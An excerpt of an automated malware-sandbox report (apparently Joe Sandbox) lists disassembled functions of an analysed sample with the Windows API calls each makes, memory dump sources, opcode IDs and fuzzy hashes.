                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00D51322
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,?), ref: 00D51334
                                                                                                                                                                                                                                                                  • TerminateThread.KERNEL32(00000000,000001F6), ref: 00D51342
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D51350
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D5135F
                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00D5136F
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000), ref: 00D51376
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                  • Opcode ID: 77c6bf086286f23d7e074a54060c64e294f176425e9e762713892ebb3af9217e
                                                                                                                                                                                                                                                                  • Instruction ID: 37d39d23d5185fef57cbea9d39e5499be411a3d75631078eaad89633a2e794b5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77c6bf086286f23d7e074a54060c64e294f176425e9e762713892ebb3af9217e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CF0C932042712EBD7411B54EE49BD6BB3ABF04302F441121F50695DB19B7495A5CFA4
                                                                                                                                                                                                                                                                  Function 00D626BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00D6281D
                                                                                                                                                                                                                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00D6283E
                                                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00D6284F
                                                                                                                                                                                                                                                                  • htons.WSOCK32(?,?,?,?,?), ref: 00D62938
                                                                                                                                                                                                                                                                  • inet_ntoa.WSOCK32(?), ref: 00D628E9
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4433E: _strlen.LIBCMT ref: 00D44348
                                                                                                                                                                                                                                                                    • Part of subcall function 00D63C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00D5F669), ref: 00D63C9D
                                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 00D62992
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                  • Opcode ID: cefde41b2e2b3d60e78713df20324c4ff10b0e05d67705366ebe685afff76d2c
                                                                                                                                                                                                                                                                  • Instruction ID: d0aac77551e75bf42d07eff8dbb9eb4d689e52e5703b930af3f1b27af4094ba1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cefde41b2e2b3d60e78713df20324c4ff10b0e05d67705366ebe685afff76d2c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AB1D231604740AFD324DF24C895F3A7BE5AF84318F58854CF49A4B2A2DB71ED46CBA1
                                                                                                                                                                                                                                                                  Function 00D10527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 00D1042A
                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D10446
                                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 00D1045D
                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D1047B
                                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 00D10492
                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D104B0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                  • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                  • Instruction ID: 546623ace46784caf1254541afbbaec87061155df5149d293b78727e28250b44
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC81E971600705BBD720BE68EC81BEA77A9EF55324F24412AF511D7681EFB0D9C087B4
                                                                                                                                                                                                                                                                  Function 00D16571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D08649,00D08649,?,?,?,00D167C2,00000001,00000001,8BE85006), ref: 00D165CB
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D167C2,00000001,00000001,8BE85006,?,?,?), ref: 00D16651
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D1674B
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00D16758
                                                                                                                                                                                                                                                                    • Part of subcall function 00D13B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D06A79,?,0000015D,?,?,?,?,00D085B0,000000FF,00000000,?,?), ref: 00D13BC5
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00D16761
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00D16786
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4113127ee952e120c35ba2cb6f069d162a7e32db52daad82e98c83d85ae01b32
                                                                                                                                                                                                                                                                  • Instruction ID: 09411d1c23518c468e4f31f4d909adaf1598fcd64a31ca560f8fac088996331c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4113127ee952e120c35ba2cb6f069d162a7e32db52daad82e98c83d85ae01b32
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8151C372600216BFEB259E64EC85EFA77AAEB40754B184669FD09D6180EF34DC90C6B0
                                                                                                                                                                                                                                                                  Function 00D6C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D6C10E,?,?), ref: 00D6D415
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D451
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4C8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4FE
                                                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D6C72A
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D6C785
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00D6C7CA
                                                                                                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00D6C7F9
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00D6C853
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00D6C85F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                  • Opcode ID: eb053378e7a07e3f089861ea4b564ffe7c5ed37016e69396126f4b1f1094ee18
                                                                                                                                                                                                                                                                  • Instruction ID: f3a601f4fbd1fb8ee3dd6f91d346e2298f35b0d404b069232810c74f0dd3de4a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb053378e7a07e3f089861ea4b564ffe7c5ed37016e69396126f4b1f1094ee18
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA818C71218341AFC714DF25C885E2ABBE5FF84308F18955CF4998B2A2DB31ED45CBA2
                                                                                                                                                                                                                                                                  Function 00D4009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(00000035), ref: 00D400A9
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00D40150
                                                                                                                                                                                                                                                                  • VariantCopy.OLEAUT32(00D40354,00000000), ref: 00D40179
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(00D40354), ref: 00D4019D
                                                                                                                                                                                                                                                                  • VariantCopy.OLEAUT32(00D40354,00000000), ref: 00D401A1
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00D401AB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                  • Opcode ID: 24173a441273a18fe2d745c90e6bfabf8a592a822d45fa874bcb4bafa3b393a8
                                                                                                                                                                                                                                                                  • Instruction ID: f2c99aaf2b39f0a8a5a4d90594dd7a9e4ca835e2eebe960dd4f4f1a34b8c9d9f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24173a441273a18fe2d745c90e6bfabf8a592a822d45fa874bcb4bafa3b393a8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8151A835600310ABCF20AF64D8C9B29BBA5EF45310F249446EA0ADF2D6DBB4DC44DB76
                                                                                                                                                                                                                                                                  Function 00D59B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE41EA: _wcslen.LIBCMT ref: 00CE41EF
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00D59F2A
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D59F4B
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D59F72
                                                                                                                                                                                                                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00D59FCA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                  • String ID: X
                                                                                                                                                                                                                                                                  • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                  • Opcode ID: a1a5f59f8f92bcb223ba5b67d4c285462704ee500a1e9afd6c9b013176fd7ba4
                                                                                                                                                                                                                                                                  • Instruction ID: 60062100f734d6731218539bfa4d3fef00a31e350a37503817ad0c76154093e9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1a5f59f8f92bcb223ba5b67d4c285462704ee500a1e9afd6c9b013176fd7ba4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DE17E31604350DFDB24DF25C891A6AB7E5BF84314F04896DFC899B2A2DB31DD09DBA2
                                                                                                                                                                                                                                                                  Function 00D56ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D56F21
                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00D5707E
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00D80CC4,00000000,00000001,00D80B34,?), ref: 00D57095
                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00D57319
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                  • String ID: .lnk
                                                                                                                                                                                                                                                                  • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                  • Opcode ID: 0c9afcd7f21d28a5fc63b91c4a2affc12df8b546cf8b500ec313795c83ac1455
                                                                                                                                                                                                                                                                  • Instruction ID: ae86ff703ddf3773d98a6bb434a2da8b96d33a0aaab169c2c2c7833884b4801a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c9afcd7f21d28a5fc63b91c4a2affc12df8b546cf8b500ec313795c83ac1455
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04D15971508341AFC700EF25C88196BB7E8FF94704F54496DF999872A2DB71ED09CBA2
                                                                                                                                                                                                                                                                  Function 00CE1B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                  • BeginPaint.USER32(?,?,?), ref: 00CE1B35
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00CE1B99
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00CE1BB6
                                                                                                                                                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00CE1BC7
                                                                                                                                                                                                                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 00CE1C15
                                                                                                                                                                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00D23287
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1C2D: BeginPath.GDI32(00000000), ref: 00CE1C4B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6bd0bd9b165adb89915f8191d7b03432e88e0fe64dc1590769f394431a6efe62
                                                                                                                                                                                                                                                                  • Instruction ID: 91d700a7b3c841e433a952806504e8a92e1b9b79b5b5a947959f6be894d02d73
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6bd0bd9b165adb89915f8191d7b03432e88e0fe64dc1590769f394431a6efe62
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B41CD71104340EFDB20DF25DC84FBA7BA8EF55324F180668FAA9CA2A1D7309954DB72
                                                                                                                                                                                                                                                                  Function 00D51196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00D511B3
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00D511EE
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00D5120A
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00D51283
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00D5129A
                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00D512C8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                  • Opcode ID: d1aee245bb8d63fdfd5c67624075840ec92e4495a556dcaf58d84bcd81348ee7
                                                                                                                                                                                                                                                                  • Instruction ID: e09794a49ec10da8f7e372718515dc5beff15b394193b52bc61cd0f2cc7bca00
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1aee245bb8d63fdfd5c67624075840ec92e4495a556dcaf58d84bcd81348ee7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0415675900305ABDF04AF54DC86BAABBB9EF04304F1440A5ED08EA296DB70DE55CBB4
                                                                                                                                                                                                                                                                  Function 00D78C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00D3FBEF,00000000,?,?,00000000,?,00D239E2,00000004,00000000,00000000), ref: 00D78CA7
                                                                                                                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00D78CCD
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00D78D2C
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00D78D40
                                                                                                                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00D78D66
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00D78D8A
                                                                                                                                                                                                                                                                  Memory Dump Source
